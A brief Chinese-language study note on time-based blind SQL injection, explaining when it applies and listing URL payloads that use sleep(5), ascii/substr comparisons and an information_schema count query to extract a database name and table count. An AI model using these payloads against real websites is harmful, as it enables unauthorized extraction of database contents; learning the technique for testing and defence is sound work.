时间盲注！

适用场景

union注入无显示位置和布尔盲注没有结果，页面显示正常，无法判断注入点是否存在那么我们就可以用时间盲注

原理

根据sleep函数来判断

操作方法

判断是否存在注入

判断注入类型

判断能使用的注入方式

?id=1' and 1=1%23回显正常
?id=1' and 1=2%23回显不正常
?id=1' and sleep(5)%23发现页面延迟了五秒钟响应，证明存在时间盲注

获取数据库名称

?id=1' and if((ascii(substr(database(),1,1))>n),sleep(5),1)%23

获取表的数量

?id=1' and if((select count(*) from information_schema.tables where table_schema=database())>5,sleep(5),1)%23

后面相似